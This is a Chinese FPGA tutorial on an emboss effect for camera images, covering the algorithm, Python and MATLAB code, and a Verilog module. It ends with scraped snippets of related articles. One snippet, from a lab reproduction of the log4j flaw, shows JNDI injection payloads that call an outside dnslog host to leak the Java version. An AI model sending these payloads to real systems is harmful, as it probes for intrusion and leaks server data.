PotatoPie 4.0 实验教程(32) —— FPGA实现摄像头图像浮雕效果

什么是浮雕效果?

浮雕效果是一种图像处理技术,用于将图像转换为看起来像浮雕一样的效果,给人一种凸起或凹陷的立体感觉,下面第二张图就是图像处理实现浮雕效果。

不过这个图是用Adobe公司的PS人工P图实现的,效果比较好,算法比我们在本教程讲述的要复杂很多,当然算法也没有公开。

图像的浮雕效果怎么实现?

图像的浮雕效果通常是通过以下步骤实现的:

  1. 转换为灰度图像:首先,将彩色图像转换为灰度图像。因为浮雕效果更适用于单通道的灰度图像,而且计算简单。

  2. 计算浮雕效果:对于每个像素,计算其与相邻像素的亮度差异。这个差异值越大,就越可能是立体感觉的边界。

  3. 映射到目标图像:根据计算的差异值,将图像中的每个像素替换为其灰度值加上一个固定的偏移量。通常,亮度差越大,偏移量就越大,从而产生浮雕效果。

  4. 调整浮雕强度:可以通过调整偏移量的大小来控制浮雕的强度。较大的偏移量将产生更加明显的浮雕效果,而较小的偏移量则会产生更加柔和的效果。

  5. 输出结果:最终得到的图像就是具有浮雕效果的图像,可以保存或者显示出来。

浮雕效果的实现方法有多种,但通常包括计算亮度差异、映射到目标图像和调整强度等步骤。

浮雕效果旨在突出图像中的变化部分,减弱相似部分,从而产生一种立体感。一般的处理流程如下:

  1. 差值计算:对于每个像素点,计算其左上角像素与右下角像素的亮度差值,然后加上一个固定的偏移值(通常为128)。这个过程突出了图像中的边缘和变化部分。

  2. 边界处理:对计算得到的差值进行边界处理,确保其范围在0到255之间。大于255的值被截断为255,小于0的值被截断为0。

  3. 像素替换:用处理后的差值替换原始图像中对应位置的像素值,产生浮雕效果。

python实现图像的浮点效果处理源码

PotatoPie 4.0 实验教程(32) —— FPGA实现摄像头图像浮雕效果-Anlogic-安路论坛-FPGA CPLD-ChipDebug

这段代码实现了将一张彩色图像转换为灰度图像,并对灰度图像进行浮雕效果的处理。具体功能如下:

  1. 读取名为”Lena.jpg”的彩色图像文件。
  2. 将彩色图像转换为灰度图像,以便后续处理。
  3. 计算浮雕效果图像,通过对每个像素点的领域像素进行差值计算,并添加一个偏置值(128),然后将结果限制在[0, 255]的范围内,得到浮雕效果图像。
  4. 显示原始灰度图像、浮雕效果图像以及另一个浮雕效果图像(在计算时采用不同的方法)。

函数功能说明:

  • cv2.imread(imagePath): 读取图像文件,返回图像的Numpy数组表示。
  • cv2.cvtColor(imageIn, cv2.COLOR_BGR2GRAY): 将彩色图像转换为灰度图像。
  • plt.imshow(image, cmap='gray'): 将图像显示在matplotlib窗口中,使用灰度色彩映射。
  • plt.title('title', fontproperties=font): 设置图像的标题,使用指定的字体。

上面这段代码中我们运用了两种方式计算浮雕效果:

  • 第一种:imageGray(i-1, j-1) - imageGray(i+1, j+1) + 128; 即像素点的左上角像素与右下角的像素做差值然后加上 128 
  • 第二种:imageGray(i, j+1) - imageGray(i, j) + 128; 采用一行像素中前后两个像素做差值然后加上128

下面是两种浮雕效果的示意图,可以看到第一种的效果要比第二种的效果好。

MATLAB实现图像的浮点效果处理源码

PotatoPie 4.0 实验教程(32) —— FPGA实现摄像头图像浮雕效果-Anlogic-安路论坛-FPGA CPLD-ChipDebug

这段 MATLAB 代码实现了对输入的彩色图像进行浮雕效果处理,并显示处理前后的图像。以下是代码的详细功能介绍:

  1. 清除工作空间:

    • 使用 clearclear all 和 clc 命令清除 MATLAB 工作空间中的所有变量、函数以及命令窗口的内容。
  2. 获取当前脚本所在目录:

    • 使用 mfilename 和 fileparts 函数获取当前 MATLAB 脚本所在的目录。
  3. 读取图像文件:

    • 使用 imread 函数读取名为 “Lena.jpg” 的图像文件,该文件位于脚本所在目录。
  4. 将图像转换为灰度图像:

    • 使用 rgb2gray 函数将彩色图像转换为灰度图像。
  5. 初始化浮雕效果图像矩阵:

    • 使用 zeros 函数初始化一个与灰度图像大小相同的全零矩阵,用于存储浮雕效果图像。
  6. 计算浮雕效果:

    • 使用嵌套的 for 循环遍历灰度图像的每个像素点。
    • 对于每个像素点,计算其浮雕像素值,即该像素与其左上角像素的灰度值差加上 128。
    • 通过限制像素值范围确保浮雕像素值在 0 到 255 之间。
    • 将计算得到的浮雕像素值赋给对应位置的浮雕效果图像矩阵。
  7. 显示图像:

    • 使用 subplot 和 imshow 函数在 MATLAB 中创建一个包含三个子图的图像窗口。
    • 第一个子图显示原始的灰度图像。
    • 第二个子图显示经过浮雕效果处理后的图像。
    • 第三个子图显示另一个经过浮雕效果处理后的图像。

通过这段代码,可以清楚地展示了原始图像和经过浮雕效果处理后的图像,帮助用户理解浮雕效果处理的效果和实现过程。

上面这段代码中我们运用了两种方式计算浮雕效果:

  • 第一种:imageGray(i-1, j-1) - imageGray(i+1, j+1) + 128; 即像素点的左上角像素与右下角的像素做差值然后加上 128 
  • 第二种:imageGray(i, j+1) - imageGray(i, j) + 128; 采用一行像素中前后两个像素做差值然后加上128

下面是两种浮雕效果的示意图,可以看到第一种的效果要比第二种的效果好。

FPGA工程分析

层次图

demo18相比,只是多了一个img_emboss的模块,也就是下面这一段代码,在从SDRAM读出来之后,经它处理后再输出hdmi_tx模块。

img_emboss u_img_emboss
(.i_clk(clk_pixel),.i_rst_n(sys_rst_n),.i_hs(VGA_HS),     .i_vs(VGA_VS),     .i_de  (VGA_DE),       .i_r(VGA_RGB[23:16]),.i_g(VGA_RGB[15:8] ),.i_b(VGA_RGB[7:0]  ),    .value(65),  .o_hs(emboss_hs),.o_vs(emboss_vs),.o_de(emboss_de),   .o_gray(emboss_data)
);

img_emboss模块源代码分析

前面讲过有两种实现浮雕效果的算法,为了简化运算和让教程更易懂,我们这个教程中先采用第二种算法。在后面会再开一篇讲解如何实现浮雕效果的第一种算法。

img_emboss核心代码总共有三步:

1、转灰度图,前面的课程中介绍过

r_d0 <= 77 * i_r;

g_d0 <= 150 * i_g;
b_d0 <= 29 * i_b;

2、浮雕计算,这里即为采用第二种方法,gray_d0[15:8]是当前像素的灰度值,gray_reg是前一像素的灰度值

assign emboss = gray_d0[15:8] - gray_reg + value; // 浮雕效果值计算

3.对计算出来的值进行防溢出处理,详见代码最后一段always;

管脚约束

与PotatoPie 4.0 实验教程(18) —— FPGA实现OV5640摄像头采集以SDRAM作为显存进行HDMI输出显示相同,不作赘述。

时序约束

与PotatoPie 4.0 实验教程(18) —— FPGA实现OV5640摄像头采集以SDRAM作为显存进行HDMI输出显示相同,不作赘述。

实验效果

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/318135.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

使用unreal engine5.3.2创建c++第一人称游戏

UE5系列文章目录 文章目录 UE5系列文章目录前言一、NuGet 简介二、解决方法&#xff1a; 前言 为了使用unreal engine5.3.2创建c第一人称游戏&#xff0c;今天安装了Visual Studio 2022专业版。在ue5中创建c工程&#xff0c;结果编译器报错&#xff1a; 严重性 代码 说明 项目…

酒水门店私域流量运营搭建执行规划方案

【干货资料持续更新&#xff0c;以防走丢】 酒水门店私域流量运营搭建执行规划方案 部分资料预览 资料部分是网络整理&#xff0c;仅供学习参考。 PPT可编辑&#xff08;完整资料包含以下内容&#xff09; 目录 精酿啤酒品牌私域执行运营的内容策划&#xff0c;涉及以下几个…

VULHUB复现log4j反序列化漏洞-CVE-2021-44228

本地下载vulhub复现就完了&#xff0c;环境搭建不讲&#xff0c;网上其他文章很好。 访问该环境&#xff1a; POC 构造&#xff08;任选其一&#xff09;&#xff1a; ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn} ${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}我是…

【跟马少平老师学AI】-【神经网络是怎么实现的】(六)过拟合问题

一句话归纳&#xff1a; 1&#xff09;过拟合问题&#xff1a; 图中的点为样本直线欠拟合曲线2过拟合 2&#xff09;迭代次数与拟合情况&#xff1a; 训练次数过多可能导致过拟合。 3&#xff09;正则化项法弱化过拟后问题&#xff1a; 加正则项&#xff0c;在最小化损失函数时…

Github 2024-05-02 Go开源项目日报 Top10

根据Github Trendings的统计,今日(2024-05-02统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下: 开发语言项目数量Go项目10PureBasic项目1Kubernetes: 容器化应用程序管理系统 创建周期:3618 天开发语言:Go协议类型:Apache License 2.0Star数量:106913 个…

Ubuntu安装Neo4j

Ubuntu&#xff08;在线版&#xff09; 更新软件源 sudo apt-get update 添加Neo4j官方存储库 wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add - 将地址添加到系统的软件包源列表中 echo deb https://debian.neo4j.com stable latest | su…

stm32单片机开发三、DMA

DMA其实就是一种将ADC的数据寄存器、串口的数据寄存器等等一些数据放到sram中特定位置&#xff0c;方便CPU去读取 比如ADC转换&#xff0c;DMA直接转换的ADC的值放在内存中的特定位置&#xff0c;CPU可以直接去读取 uint16_t AD_Value[4]; //定义用于存放AD转换结果的全局…

C语言/数据结构——每日一题(反转链表)

一.前言 大家好&#xff01;今天又是每日一题环节。今天我为大家分享了一道单链表题——反转链表。 废话不多说&#xff0c;让我们直接进入正题吧。 二.正文 1.1题目信息 这是一道leetCode上面的一道题&#xff1a;https://leetcode.cn/problems/reverse-linked-list 1.2解…

ios CI/CD 持续集成 组件化专题五-(自动发布私有库-组件化搭建)

一&#xff1a;手动发布私有库总结 手动发布pod私有库&#xff0c;需要进行如下几步操作&#xff1a; 1、修改完代码之后&#xff0c;需要提交代码push到git仓库。 2、给代码打tag。 3、修改podspec文件的version值&#xff0c;使其和设置的tag一直。 4、命令行执行pod repo…

用js代码实现贪吃蛇小游戏

js已经学了大部分了&#xff0c;现在就利用我所学的js知识试试做贪吃蛇小游戏吧 以下部分相关图片以及思路笔记均出自渡一陈老师的视频 首先制作简单的静态页面&#xff0c;添加贪吃蛇移动的背景和相关图片&#xff0c;比如开始游戏等等 将各个功能均封装在函数中&#xff0…

毫米波雷达多人呼吸心跳检测MATLAB仿真

本文基于TI的IWR1642毫米波雷达 2T4R MIMO阵列&#xff0c;通过实际采集数据算法仿真&#xff0c;实现多人呼吸心跳检测。 文章末尾给出了本文的仿真代码。 主要内容包含&#xff1a; &#xff08;1&#xff09;雷达参数设定 &#xff08;2&#xff09;ADC数据导入 &#xff08…

rocketmq dashboard控制台中topic状态无法展示

现象 在使用rocketmq控制台查看topic状态和订阅状态时&#xff0c;出现错误和没有信息的情况。 原因 rocketmq控制台版本问题&#xff0c;最新版本为1.0.1&#xff0c;支持rocketmq5版本&#xff0c;如果使用rocketmq4版本的服务无法兼容对应的数据。同理1.0.0版本也无法兼容ro…

AI图书推荐:用ChatGPT快速创建在线课程

您是否是您领域的专家&#xff0c;拥有丰富的知识和技能可以分享&#xff1f;您是否曾想过创建一个在线课程&#xff0c;但被这个过程吓倒了&#xff1f;那么&#xff0c;是时候把这些担忧放在一边&#xff0c;迈出这一步了&#xff01;有了这本指南和ChatGPT的帮助&#xff0c…

【前端】-【防止接口重复请求】

文章目录 需求实现方案方案一方案二方案三 需求 对整个的项目都做一下接口防止重复请求的处理 实现方案 方案一 思路&#xff1a;通过使用axios拦截器&#xff0c;在请求拦截器中开启全屏Loading&#xff0c;然后在响应拦截器中将Loading关闭。 代码&#xff1a; 问题&…

Scala应用 —— JDBC的创建

文章目录 Scala应用 —— JDBC的创建前言一、JDBC的创建过程1.初始化连接1.1 配置驱动1.2 创建连接对象 2. 初始化执行器2.1 创建执行器对象2.2 初始化执行器参数 3. 执行操作并返回结果 二、Scala JDBC的基本设计思路1. 操作步骤设计2. 解决结果差异化3.实现jdbc方法并输出结果…

WebGL/Cesium 大空间相机抖动 RTE(Relative to Eye)实现原理简析

在浏览器中渲染大尺寸 3D 模型&#xff1a;Speckle 处理空间抖动的方法 WebGL/Cesium 大空间相机抖动 RTE(Relative to Eye)实现原理简析 注: 相机空间和视图空间 概念等效混用 1、实现的关键代码 const material new THREE.RawShaderMaterial({uniforms: {cameraPostion: {…

《十二》Qt各种对话框之FileDialog文件对话框及QMessageBox 消息对话框

QFileDialog 对话框 选择打开一个文件 若要打开一个文件&#xff0c;可调用静态函数 QFileDialog::getOpenFileName()&#xff0c;“打开一个文件”按钮的响应代码如下&#xff1a; void Dialog::on_btnOpen_clicked() { //选择单个文件QString curPathQDir::currentPath()…

React | React.cloneElement 的使用

我看到同事的代码里有 cloneElement&#xff0c;于是去了解了一下这个函数。 就跟它的名字一样&#xff0c;克隆元素&#xff0c;可以基于一个元素创建一个新的元素&#xff0c;并且为新元素添加新的属性或者覆盖已有的属性。 下面是一个简单例子&#xff1a; .node1 {backg…

PotatoPie 4.0 实验教程(41) —— FPGA实现RISC-V 扩展 GPIO UART Timer功能

TD工程介绍 我们提供的TD工程里的RISC-V核默认就开启了GPIO UART扩展&#xff0c;可以看到还有SPI和I2C扩展。因此后面的实验中TD的工程我们基本不怎么修改TD的内容&#xff0c;只需要修改TD工具中Soc_Top.v文件中的TCM0_INITFILE为FD生成的固件名称即可&#xff0c;主要修我以…

Apache Seata基于改良版雪花算法的分布式UUID生成器分析2

title: 关于新版雪花算法的答疑 author: selfishlover keywords: [Seata, snowflake, UUID, page split] date: 2021/06/21 本文来自 Apache Seata官方文档&#xff0c;欢迎访问官网&#xff0c;查看更多深度文章。 关于新版雪花算法的答疑 在上一篇关于新版雪花算法的解析中…